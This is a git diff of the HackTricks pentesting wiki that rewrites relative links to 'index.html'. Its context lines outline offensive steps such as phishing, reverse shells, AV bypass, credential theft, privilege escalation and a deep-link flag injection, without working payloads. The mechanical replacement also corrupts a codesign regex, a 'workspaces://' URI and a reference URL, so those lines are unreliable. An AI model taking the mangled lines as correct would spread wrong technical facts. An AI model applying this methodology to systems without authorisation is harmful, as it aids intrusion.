+48,7 @@ This tool can scan an image and will **extract pcaps** inside it, **network info bulk_extractor memory.img -o out_folder ``` -Navigate through **all the information** that the tool has gathered \(passwords?\), **analyse** the **packets** \(read[ **Pcaps analysis**](../pcap-inspection/)\), search for **weird domains** \(domains related to **malware** or **non-existent**\). +Navigate through **all the information** that the tool has gathered \(passwords?\), **analyse** the **packets** \(read[ **Pcaps analysis**](../pcap-inspection/index.html)\), search for **weird domains** \(domains related to **malware** or **non-existent**\). ## PhotoRec diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md index 83e475bd3..d89f9b6f5 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md @@ -52,7 +52,7 @@ This tool can scan an image and will **extract pcaps** inside it, **network info bulk_extractor memory.img -o out_folder ``` -Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**). +Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/index.html)), search for **weird domains** (domains related to **malware** or **non-existent**). ### PhotoRec diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/README.md b/src/generic-methodologies-and-resources/external-recon-methodology/README.md index 49a2bbfef..752eab1ad 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/README.md @@ -526,8 +526,8 @@ ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http: ### **Buckets Brute Force** -While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/)**.**\ -Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../../network-services-pentesting/pentesting-web/buckets/). +While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/index.html)**.**\ +Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../../network-services-pentesting/pentesting-web/buckets/index.html). ### **Monitorization** @@ -536,7 +536,7 @@ You can **monitor** if **new subdomains** of a domain are created by monitoring ### **Looking for vulnerabilities** Check for possible [**subdomain takeovers**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\ -If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/). +If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/index.html). If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/index.html#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\ &#xNAN;_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ @@ -556,7 +556,7 @@ You can also check for domains pointing a specific IP address using the tool [** **Port scan all the IPs that doesn’t belong to CDNs** (as you highly probably won’t find anything interested in there). In the running services discovered you might be **able to find vulnerabilities**. -**Find a** [**guide**](../pentesting-network/) **about how to scan hosts.** +**Find a** [**guide**](../pentesting-network/index.html) **about how to scan hosts.** ## Web servers hunting @@ -674,9 +674,9 @@ There are also free services that allow you to **scan public repositories**, suc - [**Snyk**](https://app.snyk.io/) -## [**Pentesting Web Methodology**](../../network-services-pentesting/pentesting-web/) +## [**Pentesting Web Methodology**](../../network-services-pentesting/pentesting-web/index.html) -The **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../../network-services-pentesting/pentesting-web/). +The **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../../network-services-pentesting/pentesting-web/index.html). I also want to do a special mention to the section [**Web Automated Scanners open source tools**](../../network-services-pentesting/pentesting-web/index.html#automatic-scanners), as, if you shouldn't expect them to find you very sensitive vulnerabilities, they come handy to implement them on **workflows to have some initial web information.** diff --git a/src/generic-methodologies-and-resources/pentesting-methodology.md b/src/generic-methodologies-and-resources/pentesting-methodology.md index 542dd2920..ea38ab2dd 100644 --- a/src/generic-methodologies-and-resources/pentesting-methodology.md +++ b/src/generic-methodologies-and-resources/pentesting-methodology.md @@ -13,14 +13,14 @@ _Hacktricks logos designed by_ [_@ppiernacho_](https://www.instagram.com/ppieran Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../hardware-physical-access/physical-attacks.md) and others about [**escaping from GUI applications**](../hardware-physical-access/escaping-from-gui-applications.md). -### 1 - [Discovering hosts inside the network ](pentesting-network/index.html#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/) +### 1 - [Discovering hosts inside the network ](pentesting-network/index.html#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/index.html) **Depending** if the **test** you are perform is an **internal or external test** you may be interested on finding **hosts inside the company network** (internal test) or **finding assets of the company on the internet** (external test). > [!NOTE] > Note that if you are performing an external test, once you manage to obtain access to the internal network of the company you should re-start this guide. -### **2-** [**Having Fun with the network**](pentesting-network/) **(Internal)** +### **2-** [**Having Fun with the network**](pentesting-network/index.html) **(Internal)** **This section only applies if you are performing an internal test.**\ Before attacking a host maybe you prefer to **steal some credentials** **from the network** or **sniff** some **data** to learn **passively/actively(MitM)** what can you find inside the network. You can read [**Pentesting Network**](pentesting-network/index.html#sniffing). @@ -39,7 +39,7 @@ If there isn't any fancy exploit for any running service, you should look for ** **Inside this book you will find a guide to pentest the most common services** (and others that aren't so common)**. Please, search in the left index the** _**PENTESTING**_ **section** (the services are ordered by their default ports). -**I want to make a special mention of the** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **part (as it is the most extensive one).**\ +**I want to make a special mention of the** [**Pentesting Web**](../network-services-pentesting/pentesting-web/index.html) **part (as it is the most extensive one).**\ Also, a small guide on how to[ **find known vulnerabilities in software**](../generic-hacking/search-exploits.md) can be found here. **If your service is not inside the index, search in Google** for other tutorials and **let me know if you want me to add it.** If you **can't find anything** in Google, perform your **own blind pentesting**, you could start by **connecting to the service, fuzzing it and reading the responses** (if any). @@ -52,13 +52,13 @@ There are also several tools that can perform **automatic vulnerabilities assess In some scenarios a **Brute-Force** could be useful to **compromise** a **service**. [**Find here a CheatSheet of different services brute forcing**](../generic-hacking/brute-force.md)**.** -### 6- [Phishing](phishing-methodology/) +### 6- [Phishing](phishing-methodology/index.html) -If at this point you haven't found any interesting vulnerability you **may need to try some phishing** in order to get inside the network. You can read my phishing methodology [here](phishing-methodology/): +If at this point you haven't found any interesting vulnerability you **may need to try some phishing** in order to get inside the network. You can read my phishing methodology [here](phishing-methodology/index.html): -### **7-** [**Getting Shell**](../generic-hacking/reverse-shells/) +### **7-** [**Getting Shell**](../generic-hacking/reverse-shells/index.html) -Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](../generic-hacking/reverse-shells/). +Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](../generic-hacking/reverse-shells/index.html). Specially in Windows you could need some help to **avoid antiviruses**: [**Check this page**](../windows-hardening/av-bypass.md)**.**\\ @@ -68,7 +68,7 @@ If you have troubles with the shell, you can find here a small **compilation of - [**Linux**](../linux-hardening/useful-linux-commands.md) - [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md) -- [**Windows (PS)**](../windows-hardening/basic-powershell-for-pentesters/) +- [**Windows (PS)**](../windows-hardening/basic-powershell-for-pentesters/index.html) ### **9 -** [**Exfiltration**](../generic-hacking/exfiltration.md) @@ -79,19 +79,19 @@ You will probably need to **extract some data from the victim** or even **introd #### **10.1- Local Privesc** If you are **not root/Administrator** inside the box, you should find a way to **escalate privileges.**\ -Here you can find a **guide to escalate privileges locally in** [**Linux**](../linux-hardening/privilege-escalation/) **and in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\ +Here you can find a **guide to escalate privileges locally in** [**Linux**](../linux-hardening/privilege-escalation/index.html) **and in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/index.html)**.**\ You should also check this pages about how does **Windows work**: -- [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs/) -- How does [**NTLM works**](../windows-hardening/ntlm/) +- [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs/index.html) +- How does [**NTLM works**](../windows-hardening/ntlm/index.html) - How to [**steal credentials**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md) in Windows -- Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/) +- Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/index.html) **Don't forget to checkout the best tools to enumerate Windows and Linux local Privilege Escalation paths:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) #### **10.2- Domain Privesc** -Here you can find a [**methodology explaining the most common actions to enumerate, escalate privileges and persist on an Active Directory**](../windows-hardening/active-directory-methodology/). Even if this is just a subsection of a section, this process could be **extremely delicate** on a Pentesting/Red Team assignment. +Here you can find a [**methodology explaining the most common actions to enumerate, escalate privileges and persist on an Active Directory**](../windows-hardening/active-directory-methodology/index.html). Even if this is just a subsection of a section, this process could be **extremely delicate** on a Pentesting/Red Team assignment. ### 11 - POST @@ -111,20 +111,20 @@ TODO: Complete persistence Post in Windows & Linux With the **gathered credentials** you could have access to other machines, or maybe you need to **discover and scan new hosts** (start the Pentesting Methodology again) inside new networks where your victim is connected.\ In this case tunnelling could be necessary. Here you can find [**a post talking about tunnelling**](../generic-hacking/tunneling-and-port-forwarding.md).\ -You definitely should also check the post about [Active Directory pentesting Methodology](../windows-hardening/active-directory-methodology/). There you will find cool tricks to move laterally, escalate privileges and dump credentials.\ -Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be very useful to pivot on Windows environments.. +You definitely should also check the post about [Active Directory pentesting Methodology](../windows-hardening/active-directory-methodology/index.html). There you will find cool tricks to move laterally, escalate privileges and dump credentials.\ +Check also the page about [**NTLM**](../windows-hardening/ntlm/index.html), it could be very useful to pivot on Windows environments.. ### MORE -#### [Android Applications](../mobile-pentesting/android-app-pentesting/) +#### [Android Applications](../mobile-pentesting/android-app-pentesting/index.html) #### **Exploiting** -- [**Basic Linux Exploiting**](broken-reference/) +- [**Basic Linux Exploiting**](broken-reference/index.html) - [**Basic Windows Exploiting**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md) -- [**Basic exploiting tools**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/) +- [**Basic exploiting tools**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html) -#### [**Basic Python**](python/) +#### [**Basic Python**](python/index.html) #### **Crypto tricks** diff --git a/src/generic-methodologies-and-resources/python/README.md b/src/generic-methodologies-and-resources/python/README.md index 0c59237c0..92dfdb4fc 100644 --- a/src/generic-methodologies-and-resources/python/README.md +++ b/src/generic-methodologies-and-resources/python/README.md @@ -7,7 +7,7 @@ - [**Pyscript hacking tricks**](pyscript.md) - [**Python deserializations**](../../pentesting-web/deserialization/index.html#python) -- [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/) +- [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/index.html) - [**Basic python web requests syntax**](web-requests.md) - [**Basic python syntax and libraries**](basic-python.md) diff --git a/src/generic-methodologies-and-resources/python/python-internal-read-gadgets.md b/src/generic-methodologies-and-resources/python/python-internal-read-gadgets.md index cc1797907..f20308d1b 100644 --- a/src/generic-methodologies-and-resources/python/python-internal-read-gadgets.md +++ b/src/generic-methodologies-and-resources/python/python-internal-read-gadgets.md @@ -15,7 +15,7 @@ app = Flask(__name__, template_folder='templates') app.secret_key = '(:secret:)' ``` -In this case it's possible to access this object just using any gadget to **access global objects** from the [**Bypass Python sandboxes page**](bypass-python-sandboxes/). +In this case it's possible to access this object just using any gadget to **access global objects** from the [**Bypass Python sandboxes page**](bypass-python-sandboxes/index.html). In the case where **the vulnerability is in a different python file**, you need a gadget to traverse files to get to the main one to **access the global object `app.secret_key`** to change the Flask secret key and be able to [**escalate privileges** knowing this key](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign). diff --git a/src/linux-hardening/linux-privilege-escalation-checklist.md b/src/linux-hardening/linux-privilege-escalation-checklist.md index 5fbeb44af..8caee0228 100644 --- a/src/linux-hardening/linux-privilege-escalation-checklist.md +++ b/src/linux-hardening/linux-privilege-escalation-checklist.md @@ -72,7 +72,7 @@ - [ ] Generic users/groups **enumeration** - [ ] Do you have a **very big UID**? Is the **machine** **vulnerable**? -- [ ] Can you [**escalate privileges thanks to a group**](privilege-escalation/interesting-groups-linux-pe/) you belong to? +- [ ] Can you [**escalate privileges thanks to a group**](privilege-escalation/interesting-groups-linux-pe/index.html) you belong to? - [ ] **Clipboard** data? - [ ] Password Policy? - [ ] Try to **use** every **known password** that you have discovered previously to login **with each** possible **user**. Try to login also without a password. diff --git a/src/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md b/src/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md index 5e96107c7..40dabbcb9 100644 --- a/src/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md +++ b/src/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md @@ -90,7 +90,7 @@ The tool [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefd ## RCE in NodeJS Debugger/Inspector > [!NOTE] -> If you came here looking how to get [**RCE from a XSS in Electron please check this page.**](../../network-services-pentesting/pentesting-web/electron-desktop-apps/) +> If you came here looking how to get [**RCE from a XSS in Electron please check this page.**](../../network-services-pentesting/pentesting-web/electron-desktop-apps/index.html) Some common ways to obtain **RCE** when you can **connect** to a Node **inspector** is using something like (looks that this **won't work in a connection to Chrome DevTools protocol**): @@ -108,7 +108,7 @@ In this section I will just list interesting things I find people have used to e ### Parameter Injection via Deep Links -In the [**CVE-2021-38112**](https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/) Rhino security discovered that an application based on CEF **registered a custom UR**I in the system (workspaces://) that received the full URI and then **launched the CEF based applicatio**n with a configuration that was partially constructing from that URI. +In the [**CVE-2021-38112**](https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/) Rhino security discovered that an application based on CEF **registered a custom UR**I in the system (workspaces://index.html) that received the full URI and then **launched the CEF based applicatio**n with a configuration that was partially constructing from that URI. It was discovered that the URI parameters where URL decoded and used to launch the CEF basic application, allowing a user to **inject** the flag **`--gpu-launcher`** in the **command line** and execute arbitrary things. diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/README.md index 3525f8404..20a76642a 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/README.md @@ -95,7 +95,7 @@ Therefore, an attacker that wants to successfully compromise a macOS machine wil These privileges are usually given in the form of **entitlements** the application is signed with, or the application might requested some accesses and after the **user approving them** they can be found in the **TCC databases**. Another way a process can obtain these privileges is by being a **child of a process** with those **privileges** as they are usually **inherited**. -Follow these links to find different was to [**escalate privileges in TCC**](macos-security-protections/macos-tcc/index.html#tcc-privesc-and-bypasses), to [**bypass TCC**](macos-security-protections/macos-tcc/macos-tcc-bypasses/) and how in the past [**SIP has been bypassed**](macos-security-protections/macos-sip.md#sip-bypasses). +Follow these links to find different was to [**escalate privileges in TCC**](macos-security-protections/macos-tcc/index.html#tcc-privesc-and-bypasses), to [**bypass TCC**](macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html) and how in the past [**SIP has been bypassed**](macos-security-protections/macos-sip.md#sip-bypasses). ## macOS Traditional Privilege Escalation diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md index c41fd2993..a3fb41ac5 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md @@ -17,11 +17,11 @@ The entitlement **`com.apple.rootless.install`** allows to **bypass SIP**. Check ### **`com.apple.system-task-ports` (previously called `task_for_pid-allow`)** -This entitlement allows to get the **task port for any** process, except the kernel. Check [**this for more info**](../macos-proces-abuse/macos-ipc-inter-process-communication/). +This entitlement allows to get the **task port for any** process, except the kernel. Check [**this for more info**](../macos-proces-abuse/macos-ipc-inter-process-communication/index.html). ### `com.apple.security.get-task-allow` -This entitlement allows other processes with the **`com.apple.security.cs.debugger`** entitlement to get the task port of the process run by the binary with this entitlement and **inject code on it**. Check [**this for more info**](../macos-proces-abuse/macos-ipc-inter-process-communication/). +This entitlement allows other processes with the **`com.apple.security.cs.debugger`** entitlement to get the task port of the process run by the binary with this entitlement and **inject code on it**. Check [**this for more info**](../macos-proces-abuse/macos-ipc-inter-process-communication/index.html). ### `com.apple.security.cs.debugger` diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md index e037af877..68320b06b 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md @@ -212,7 +212,7 @@ However, there are some files whose signature won't be checked, these have the k rules2 ... - ^(.*/)?\.DS_Store$ + ^(.*/index.html)?\.DS_Store$ omit diff --git a/src/mobile-pentesting/android-app-pentesting/README.md b/src/mobile-pentesting/android-app-pentesting/README.md index eb8c60af7..c9bbb8f86 100644 --- a/src/mobile-pentesting/android-app-pentesting/README.md +++ b/src/mobile-pentesting/android-app-pentesting/README.md @@ -439,7 +439,7 @@ It's important to also search for common web vulnerabilities within the applicat **You can access running application and hook methods on run time to change the behaviour, change values, extract values, run different code...**\ If you want to pentest Android applications you need to know how to use Frida. -- Learn how to use Frida: [**Frida tutorial**](frida-tutorial/) +- Learn how to use Frida: [**Frida tutorial**](frida-tutorial/index.html) - Some "GUI" for actions with Frida: [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security) - Ojection is great to automate the use of Frida: [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon) - You can find some Awesome Frida scripts here: [**https://codeshare.frida.re/**](https://codeshare.frida.re) diff --git a/src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md b/src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md index 1f18efd5f..26a77370a 100644 --- a/src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md +++ b/src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md @@ -194,7 +194,7 @@ To install iPad-specific applications on iPhone or iPod touch devices, the **UID ## References -- [https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/](ttps://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/) +- [https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/](ttps://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/index.html) - [https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0052/](https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0052/) - [https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0053/](https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0053/) - [https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0054/](https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0054/) diff --git a/src/network-services-pentesting/pentesting-kerberos-88/README.md b/src/network-services-pentesting/pentesting-kerberos-88/README.md index 71820b4b3..dbc1286da 100644 --- a/src/network-services-pentesting/pentesting-kerberos-88/README.md +++ b/src/network-services-pentesting/pentesting-kerberos-88/README.md @@ -17,7 +17,7 @@ PORT STATE SERVICE 88/tcp open kerberos-sec ``` -### **To learn how to abuse Kerberos you should read the post about** [**Active Directory**](../../windows-hardening/active-directory-methodology/)**.** +### **To learn how to abuse Kerberos you should read the post about** [**Active Directory**](../../windows-hardening/active-directory-methodology/index.html)**.** ## More diff --git a/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md b/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md index 03a5dc8db..78dbbb1e0 100644 --- a/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md +++ b/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md @@ -35,7 +35,7 @@ Try using **different verbs** to access the file: `GET, HEAD, POST, PUT, DELETE, - `X-Original-URL: /admin/console` - `X-Rewrite-URL: /admin/console` -- If the page is **behind a proxy**, maybe it's the proxy the one preventing you you to access the private information. Try abusing [**HTTP Request Smuggling**](../../pentesting-web/http-request-smuggling/) **or** [**hop-by-hop headers**](../../pentesting-web/abusing-hop-by-hop-headers.md)**.** +- If the page is **behind a proxy**, maybe it's the proxy the one preventing you you to access the private information. Try abusing [**HTTP Request Smuggling**](../../pentesting-web/http-request-smuggling/index.html) **or** [**hop-by-hop headers**](../../pentesting-web/abusing-hop-by-hop-headers.md)**.** - Fuzz [**special HTTP headers**](special-http-headers.md) looking for different response. - **Fuzz special HTTP headers** while fuzzing **HTTP Methods**. - **Remove the Host header** and maybe you will be able to bypass the protection. diff --git a/src/network-services-pentesting/pentesting-web/README.md b/src/network-services-pentesting/pentesting-web/README.md index 84938d74d..0feb403ae 100644 --- a/src/network-services-pentesting/pentesting-web/README.md +++ b/src/network-services-pentesting/pentesting-web/README.md @@ -73,9 +73,9 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno - [**AEM - Adobe Experience Cloud**](aem-adobe-experience-cloud.md) - [**Apache**](apache.md) - [**Artifactory**](artifactory-hacking-guide.md) -- [**Buckets**](buckets/) +- [**Buckets**](buckets/index.html) - [**CGI**](cgi.md) -- [**Drupal**](drupal/) +- [**Drupal**](drupal/index.html) - [**Flask**](flask.md) - [**Git**](git.md) - [**Golang**](golang.md) @@ -90,17 +90,17 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno - [**Laravel**](laravel.md) - [**Moodle**](moodle.md) - [**Nginx**](nginx.md) -- [**PHP (php has a lot of interesting tricks that could be exploited)**](php-tricks-esp/) +- [**PHP (php has a lot of interesting tricks that could be exploited)**](php-tricks-esp/index.html) - [**Python**](python.md) - [**Spring Actuators**](spring-actuators.md) - [**Symphony**](symphony.md) -- [**Tomcat**](tomcat/) +- [**Tomcat**](tomcat/index.html) - [**VMWare**](vmware-esx-vcenter....md) - [**Web API Pentesting**](web-api-pentesting.md) - [**WebDav**](put-method-webdav.md) - [**Werkzeug**](werkzeug.md) - [**Wordpress**](wordpress.md) -- [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/) +- [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/index.html) _Take into account that the **same domain** can be using **different technologies** in different **ports**, **folders** and **subdomains**._\ If the web application is using any well known **tech/platform listed before** or **any other**, don't forget to **search on the Internet** new tricks (and let me know!). @@ -140,11 +140,11 @@ node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi If a CMS is used don't forget to **run a scanner**, maybe something juicy is found: -[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/)**, Railo, Axis2, Glassfish**\ -[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/), **Joomla**, **vBulletin** websites for Security issues. (GUI)\ -[**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/)**, PrestaShop, Opencart**\ -**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/) **or** [**(M)oodle**](moodle.md)\ -[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal/)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md) +[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/index.html)**, Railo, Axis2, Glassfish**\ +[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/index.html), **Joomla**, **vBulletin** websites for Security issues. (GUI)\ +[**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/index.html)**, PrestaShop, Opencart**\ +**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/index.html) **or** [**(M)oodle**](moodle.md)\ +[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal/index.html)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md) ```bash cmsmap [-f W] -F -d @@ -289,7 +289,7 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri - If you are playing **CTF**, a "common" trick is to **hide** **information** inside comments at the **right** of the **page** (using **hundreds** of **spaces** so you don't see the data if you open the source code with the browser). Other possibility is to use **several new lines** and **hide information** in a comment at the **bottom** of the web page. - **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**]()**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird) - Google API keys: If you find any API key looking like **AIza**SyA-qLheq6xjDiEIRisP_ujUseYLQCHUjik you can use the project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) to check which apis the key can access. -- **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/). +- **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/index.html). ### Special findings diff --git a/src/network-services-pentesting/pentesting-web/flask.md b/src/network-services-pentesting/pentesting-web/flask.md index d5330e365..968b3fb85 100644 --- a/src/network-services-pentesting/pentesting-web/flask.md +++ b/src/network-services-pentesting/pentesting-web/flask.md @@ -2,7 +2,7 @@ {{#include ../../banners/hacktricks-training.md}} -**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.** +**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/index.html)**.** ## Cookies diff --git a/src/network-services-pentesting/pentesting-web/graphql.md b/src/network-services-pentesting/pentesting-web/graphql.md index 3d41fcf66..059036f0e 100644 --- a/src/network-services-pentesting/pentesting-web/graphql.md +++ b/src/network-services-pentesting/pentesting-web/graphql.md @@ -465,7 +465,7 @@ However, note that the new default cookie value of the `samesite` flag of Chrome Note that it's usually possible to send the **query** **request** also as a **GET** **request and the CSRF token might not being validated in a GET request.** -Also, abusing a [**XS-Search**](../../pentesting-web/xs-search/) **attack** might be possible to exfiltrate content from the GraphQL endpoint abusing the credentials of the user. +Also, abusing a [**XS-Search**](../../pentesting-web/xs-search/index.html) **attack** might be possible to exfiltrate content from the GraphQL endpoint abusing the credentials of the user. For more information **check the** [**original post here**](https://blog.doyensec.com/2021/05/20/graphql-csrf.html). diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md index c6280ecda..effb19737 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md @@ -178,7 +178,7 @@ Check: - The **PHPSESSION cookies of the same domain are stored in the same place**, therefore if within a domain **different cookies are used in different paths** you can make that a path **accesses the cookie of the path** setting the value of the other path cookie.\ This way if **both paths access a variable with the same name** you can make the **value of that variable in path1 apply to path2**. And then path2 will take as valid the variables of path1 (by giving the cookie the name that corresponds to it in path2). - When you have the **usernames** of the users of the machine. Check the address: **/\~\** to see if the php directories are activated. -- [**LFI and RCE using php wrappers**](../../../pentesting-web/file-inclusion/) +- [**LFI and RCE using php wrappers**](../../../pentesting-web/file-inclusion/index.html) ### password_hash/password_verify @@ -228,7 +228,7 @@ php-ssrf.md &#xNAN;**\`ls\`;**\ **shell_exec("ls");** -[Check this for more useful PHP functions](php-useful-functions-disable_functions-open_basedir-bypass/) +[Check this for more useful PHP functions](php-useful-functions-disable_functions-open_basedir-bypass/index.html) ### **RCE via** **preg_replace()** diff --git 